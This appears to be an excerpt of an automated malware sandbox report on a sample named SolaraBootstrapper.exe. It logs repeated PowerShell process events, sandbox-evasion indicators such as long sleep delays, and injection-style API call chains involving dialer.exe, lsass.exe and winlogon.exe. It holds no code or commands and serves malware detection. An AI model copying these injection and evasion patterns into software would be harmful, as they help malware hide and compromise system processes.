Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Source: C:\Windows\System32\dialer.exeCode function: OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,46_2_00000001400010C0
Source: C:\Windows\System32\dialer.exeCode function: OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,63_2_00000001400010C0
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeMemory allocated: EB0000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeMemory allocated: 2D60000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeMemory allocated: 1210000 memory reserve | memory write watchJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 599859Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 599715Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 599575Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 599203Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 598935Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 598820Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 598703Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 598593Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 598485Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 598360Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 598246Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 598117Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 598000Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 597891Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6214Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1424Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeWindow / User API: threadDelayed 1331Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeWindow / User API: threadDelayed 712Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7130Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1172Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8090Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1545Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7699
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1895
Source: C:\Windows\System32\wbem\WmiPrvSE.exeWindow / User API: threadDelayed 9995
Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 3743
Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 6257
Source: C:\Windows\System32\dialer.exeWindow / User API: threadDelayed 8291
Source: C:\Windows\System32\lsass.exeWindow / User API: threadDelayed 8147
Source: C:\Windows\System32\lsass.exeWindow / User API: threadDelayed 1801
Source: C:\Windows\System32\lsass.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_68-14949
Source: C:\Windows\System32\wbem\WmiPrvSE.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_15-14897
Source: C:\Windows\System32\conhost.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_2-14893
Source: C:\Windows\System32\dialer.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_46-480
Source: C:\Windows\System32\conhost.exeAPI coverage: 4.8 %
Source: C:\Windows\System32\wbem\WmiPrvSE.exeAPI coverage: 4.8 %
Source: C:\Windows\System32\lsass.exeAPI coverage: 6.6 %
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1200Thread sleep time: -4611686018427385s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7140Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7540Thread sleep time: -6456360425798339s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7540Thread sleep time: -600000s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7540Thread sleep time: -599859s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7540Thread sleep time: -599715s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7540Thread sleep time: -599575s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7540Thread sleep time: -599203s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7540Thread sleep time: -598935s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7540Thread sleep time: -598820s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7540Thread sleep time: -598703s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7540Thread sleep time: -598593s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7540Thread sleep time: -598485s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7540Thread sleep time: -598360s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7540Thread sleep time: -598246s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7540Thread sleep time: -598117s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7540Thread sleep time: -598000s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7540Thread sleep time: -597891s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7288Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7172Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7332Thread sleep time: -9223372036854770s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7316Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7460Thread sleep count: 8090 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7444Thread sleep count: 1545 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7724Thread sleep time: -8301034833169293s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7512Thread sleep count: 7699 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7508Thread sleep count: 1895 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7720Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\System32\wbem\WmiPrvSE.exe TID: 5632Thread sleep count: 9995 > 30
Source: C:\Windows\System32\wbem\WmiPrvSE.exe TID: 5632Thread sleep time: -9995000s >= -30000s
Source: C:\Windows\System32\winlogon.exe TID: 7872Thread sleep count: 3743 > 30
Source: C:\Windows\System32\winlogon.exe TID: 7872Thread sleep time: -3743000s >= -30000s
Source: C:\Windows\System32\winlogon.exe TID: 7872Thread sleep count: 6257 > 30
Source: C:\Windows\System32\winlogon.exe TID: 7872Thread sleep time: -6257000s >= -30000s
Source: C:\Windows\System32\dialer.exe TID: 7452Thread sleep count: 8291 > 30
Source: C:\Windows\System32\dialer.exe TID: 7452Thread sleep time: -829100s >= -30000s
Source: C:\Windows\System32\lsass.exe TID: 8012Thread sleep count: 8147 > 30
Source: C:\Windows\System32\lsass.exe TID: 8012Thread sleep time: -8147000s >= -30000s
Source: C:\Windows\System32\lsass.exe TID: 8012Thread sleep count: 1801 > 30
Source: C:\Windows\System32\lsass.exe TID: 8012Thread sleep time: -1801000s >= -30000s
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\dialer.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\lsass.exeLast function: Thread delayed
Source: C:\Windows\System32\lsass.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeCode function: 2_2_0000019A4980DCE0 FindFirstFileExW,2_2_0000019A4980DCE0
Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 15_2_000001F43C54DCE0 FindFirstFileExW,15_2_000001F43C54DCE0
Source: C:\Windows\System32\winlogon.exeCode function: 53_2_000001E8589BDCE0 FindFirstFileExW,53_2_000001E8589BDCE0
Source: C:\Windows\System32\lsass.exeCode function: 68_2_00000140AE86DCE0 FindFirstFileExW,68_2_00000140AE86DCE0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 599859Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 599715Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 599575Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 599203Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 598935Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 598820Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 598703Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 598593Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 598485Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 598360Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 598246Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 598117Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 598000Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 597891Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\dialer.exeAPI call chain: ExitProcess graph end nodegraph_46-413
Source: C:\Windows\System32\dialer.exeAPI call chain: ExitProcess graph end nodegraph_63-468
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\conhost.exeCode function: 2_2_0000019A4980D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_0000019A4980D2A4
